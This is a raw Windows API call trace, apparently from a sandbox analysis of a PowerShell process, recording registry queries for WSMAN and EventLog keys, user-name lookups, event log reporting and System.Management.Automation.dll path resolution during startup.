	[0197.514] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad57c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad578, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad57c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad578*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0197.514] CoTaskMemFree (pv=0x0) 
	[0197.515] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0197.515] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x256de0, lpcchValueName=0x1ad628, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ad628, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0197.515] CoTaskMemFree (pv=0x256de0) 
	[0197.515] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0197.515] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x256de0, lpcchValueName=0x1ad628, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ad628, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0197.515] CoTaskMemFree (pv=0x256de0) 
	[0197.515] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0197.515] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x256de0, lpcchValueName=0x1ad628, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ad628, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0197.515] CoTaskMemFree (pv=0x256de0) 
	[0197.517] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad60c, lpData=0x0, lpcbData=0x1ad608*=0x0 | out: lpType=0x1ad60c*=0x1, lpData=0x0, lpcbData=0x1ad608*=0x8) returned 0x0
	[0197.517] CoTaskMemAlloc (cb=0xc) returned 0x2c2750
	[0197.517] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad5dc, lpData=0x2c2750, lpcbData=0x1ad5d8*=0x8 | out: lpType=0x1ad5dc*=0x1, lpData="2.0", lpcbData=0x1ad5d8*=0x8) returned 0x0
	[0203.498] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad5c8 | out: phkResult=0x1ad5c8*=0x328) returned 0x0
	[0203.498] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad4cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad4c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad4cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad4c8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.498] CoTaskMemFree (pv=0x0) 
	[0203.498] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0203.498] RegEnumValueW (in: hKey=0x328, dwIndex=0x0, lpValueName=0x256de0, lpcchValueName=0x1ad578, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ad578, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.498] CoTaskMemFree (pv=0x256de0) 
	[0203.498] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0203.498] RegEnumValueW (in: hKey=0x328, dwIndex=0x1, lpValueName=0x256de0, lpcchValueName=0x1ad578, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ad578, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.499] CoTaskMemFree (pv=0x256de0) 
	[0203.499] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0203.499] RegEnumValueW (in: hKey=0x328, dwIndex=0x2, lpValueName=0x256de0, lpcchValueName=0x1ad578, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ad578, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.499] CoTaskMemFree (pv=0x256de0) 
	[0203.499] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad55c, lpData=0x0, lpcbData=0x1ad558*=0x0 | out: lpType=0x1ad55c*=0x1, lpData=0x0, lpcbData=0x1ad558*=0x8) returned 0x0
	[0203.499] CoTaskMemAlloc (cb=0xc) returned 0x2c2690
	[0203.499] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad52c, lpData=0x2c2690, lpcbData=0x1ad528*=0x8 | out: lpType=0x1ad52c*=0x1, lpData="2.0", lpcbData=0x1ad528*=0x8) returned 0x0
	[0203.499] CoTaskMemFree (pv=0x2c2690) 
	[0203.500] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0203.500] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.500] CoTaskMemFree (pv=0x204490) 
	[0203.832] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0203.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.832] CoTaskMemFree (pv=0x204490) 
	[0203.837] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad5f8 | out: phkResult=0x1ad5f8*=0x2e4) returned 0x0
	[0203.843] RegQueryInfoKeyW (in: hKey=0x2e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad56c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad568, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad56c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad568*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.843] CoTaskMemFree (pv=0x0) 
	[0203.843] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0203.843] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x256de0, lpcchName=0x1ad5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.845] CoTaskMemFree (pv=0x256de0) 
	[0203.845] CoTaskMemFree (pv=0x0) 
	[0203.845] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0203.845] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x1, lpName=0x256de0, lpcchName=0x1ad5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.846] CoTaskMemFree (pv=0x256de0) 
	[0203.846] CoTaskMemFree (pv=0x0) 
	[0203.846] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0203.846] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x2, lpName=0x256de0, lpcchName=0x1ad5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.847] CoTaskMemFree (pv=0x256de0) 
	[0203.847] CoTaskMemFree (pv=0x0) 
	[0203.847] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0203.848] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x3, lpName=0x256de0, lpcchName=0x1ad5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.849] CoTaskMemFree (pv=0x256de0) 
	[0203.849] CoTaskMemFree (pv=0x0) 
	[0203.849] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0203.849] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x4, lpName=0x256de0, lpcchName=0x1ad5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.850] CoTaskMemFree (pv=0x256de0) 
	[0203.850] CoTaskMemFree (pv=0x0) 
	[0203.850] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0203.850] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x5, lpName=0x256de0, lpcchName=0x1ad5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.851] CoTaskMemFree (pv=0x256de0) 
	[0203.851] CoTaskMemFree (pv=0x0) 
	[0203.851] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0203.852] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x6, lpName=0x256de0, lpcchName=0x1ad5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.853] CoTaskMemFree (pv=0x256de0) 
	[0203.853] CoTaskMemFree (pv=0x0) 
	[0203.853] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0203.853] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x7, lpName=0x256de0, lpcchName=0x1ad5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.854] CoTaskMemFree (pv=0x256de0) 
	[0203.854] CoTaskMemFree (pv=0x0) 
	[0203.854] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0203.854] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x8, lpName=0x256de0, lpcchName=0x1ad5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.855] CoTaskMemFree (pv=0x256de0) 
	[0203.855] CoTaskMemFree (pv=0x0) 
	[0203.856] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x32c) returned 0x0
	[0203.856] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x0) returned 0x2
	[0203.856] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x304) returned 0x0
	[0203.856] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x0) returned 0x2
	[0203.856] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x308) returned 0x0
	[0203.856] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x0) returned 0x2
	[0203.856] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x30c) returned 0x0
	[0203.856] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x0) returned 0x2
	[0203.856] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x320) returned 0x0
	[0203.856] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x0) returned 0x2
	[0203.856] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x334) returned 0x0
	[0203.856] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x0) returned 0x2
	[0203.856] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x0) returned 0x5
	[0203.870] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x338) returned 0x0
	[0203.870] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x0) returned 0x2
	[0203.870] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x33c) returned 0x0
	[0203.870] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad658 | out: phkResult=0x1ad658*=0x340) returned 0x0
	[0203.870] RegCloseKey (hKey=0x340) returned 0x0
	[0203.870] RegCloseKey (hKey=0x2e4) returned 0x0
	[0203.871] RegCloseKey (hKey=0x33c) returned 0x0
	[0204.417] CoTaskMemAlloc (cb=0x804) returned 0x1b375ae0
	[0204.417] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b375ae0, nSize=0x1ad868 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1ad868) returned 0x1
	[0204.418] CoTaskMemFree (pv=0x1b375ae0) 
	[0204.419] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0204.419] GetUserNameW (in: lpBuffer=0x256de0, pcbBuffer=0x1ad8a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1ad8a8) returned 1
	[0204.419] CoTaskMemFree (pv=0x256de0) 
	[0212.232] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad5a8 | out: phkResult=0x1ad5a8*=0x344) returned 0x0
	[0212.232] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad51c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad518, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad51c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad518*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.232] CoTaskMemFree (pv=0x0) 
	[0212.232] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0212.233] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x256de0, lpcchName=0x1ad5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.233] CoTaskMemFree (pv=0x256de0) 
	[0212.233] CoTaskMemFree (pv=0x0) 
	[0212.233] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0212.233] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x256de0, lpcchName=0x1ad5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.233] CoTaskMemFree (pv=0x256de0) 
	[0212.233] CoTaskMemFree (pv=0x0) 
	[0212.233] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0212.233] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x256de0, lpcchName=0x1ad5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.233] CoTaskMemFree (pv=0x256de0) 
	[0212.233] CoTaskMemFree (pv=0x0) 
	[0212.233] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0212.233] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x256de0, lpcchName=0x1ad5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.233] CoTaskMemFree (pv=0x256de0) 
	[0212.233] CoTaskMemFree (pv=0x0) 
	[0212.233] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0212.233] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x256de0, lpcchName=0x1ad5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.233] CoTaskMemFree (pv=0x256de0) 
	[0212.233] CoTaskMemFree (pv=0x0) 
	[0212.233] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0212.233] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x256de0, lpcchName=0x1ad5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.233] CoTaskMemFree (pv=0x256de0) 
	[0212.233] CoTaskMemFree (pv=0x0) 
	[0212.233] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0212.233] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x256de0, lpcchName=0x1ad5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.233] CoTaskMemFree (pv=0x256de0) 
	[0212.233] CoTaskMemFree (pv=0x0) 
	[0212.233] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0212.233] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x256de0, lpcchName=0x1ad5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.233] CoTaskMemFree (pv=0x256de0) 
	[0212.233] CoTaskMemFree (pv=0x0) 
	[0212.234] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0212.234] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x256de0, lpcchName=0x1ad5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.234] CoTaskMemFree (pv=0x256de0) 
	[0212.234] CoTaskMemFree (pv=0x0) 
	[0212.234] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x348) returned 0x0
	[0212.234] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x0) returned 0x2
	[0212.234] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x34c) returned 0x0
	[0212.234] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x0) returned 0x2
	[0212.234] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x350) returned 0x0
	[0212.234] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x0) returned 0x2
	[0212.234] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x354) returned 0x0
	[0212.234] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x0) returned 0x2
	[0212.234] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x358) returned 0x0
	[0212.234] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x0) returned 0x2
	[0212.234] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x35c) returned 0x0
	[0212.235] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x0) returned 0x2
	[0212.235] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x0) returned 0x5
	[0213.217] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x0) returned 0x2
	[0213.217] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x344) returned 0x0
	[0213.217] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x368) returned 0x0
	[0213.230] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b860008
	[0213.787] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d209e0*="WSMan", lpRawData=0x2d20750) returned 1
	[0213.794] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0213.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.794] CoTaskMemFree (pv=0x204160) 
	[0213.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.796] CoTaskMemAlloc (cb=0x804) returned 0x1b375ae0
	[0213.796] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b375ae0, nSize=0x1ad868 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1ad868) returned 0x1
	[0213.797] CoTaskMemFree (pv=0x1b375ae0) 
	[0213.797] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0213.797] GetUserNameW (in: lpBuffer=0x256de0, pcbBuffer=0x1ad8a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1ad8a8) returned 1
	[0213.797] CoTaskMemFree (pv=0x256de0) 
	[0213.797] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d26370*="Alias", lpRawData=0x2d26100) returned 1
	[0213.811] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0213.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.811] CoTaskMemFree (pv=0x204160) 
	[0213.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
